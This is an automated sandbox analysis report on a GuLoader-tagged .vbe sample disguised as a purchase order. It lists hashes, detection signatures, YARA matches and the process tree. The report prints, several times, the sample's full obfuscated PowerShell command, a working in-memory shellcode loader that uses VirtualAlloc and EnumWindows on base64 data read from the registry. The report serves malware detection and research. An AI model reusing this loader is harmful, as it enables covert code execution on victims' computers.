Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name:PO-08784 xlsx.vbe
Analysis ID:755441
MD5:266115592f966240c14dfeeec624bdf5
SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Tags:GuLoadervbe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Machine Learning detection for dropped file
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 6000 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5984 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5064 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2912 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 2044 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
PO-08784 xlsx.vbeWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa2e:$s1: .CreateObject("WScript.Shell")
  • 0x3ed54:$p1: powershell.exe
  • 0x4b97e:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5064INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x7ef78:$b2: ::FromBase64String(
  • 0x177dc3:$b2: ::FromBase64String(
  • 0x17968c:$b2: ::FromBase64String(
  • 0x16d76:$s1: -join
  • 0x17090:$s1: -join
  • 0x23ac3:$s1: -join
  • 0x91a1f:$s1: -join
  • 0xa0480:$s1: -join
  • 0xa0be0:$s1: -join
  • 0xb6d35:$s1: -join
  • 0xc3e0a:$s1: -join
  • 0xc71dc:$s1: -join
  • 0xc788e:$s1: -join
  • 0xc937f:$s1: -join
  • 0xcb585:$s1: -join
  • 0xcbdac:$s1: -join
  • 0xcc61c:$s1: -join
  • 0xccd57:$s1: -join
  • 0xccd89:$s1: -join
  • 0xccdd1:$s1: -join
  • 0xccdf0:$s1: -join
SourceRuleDescriptionAuthorStrings
amsi64_6000.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1e4:$p1: powershell.exe

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`""
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dllJoe Sandbox ML: detected
Source: Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.526784989.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.536819420.0000000005484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4705
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4705Jump to behavior
Source: PO-08784 xlsx.vbe, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_6000.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
